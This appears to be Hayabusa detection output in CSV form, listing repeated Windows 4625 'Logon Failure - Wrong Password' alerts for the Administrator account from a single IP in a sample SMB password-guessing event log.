2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
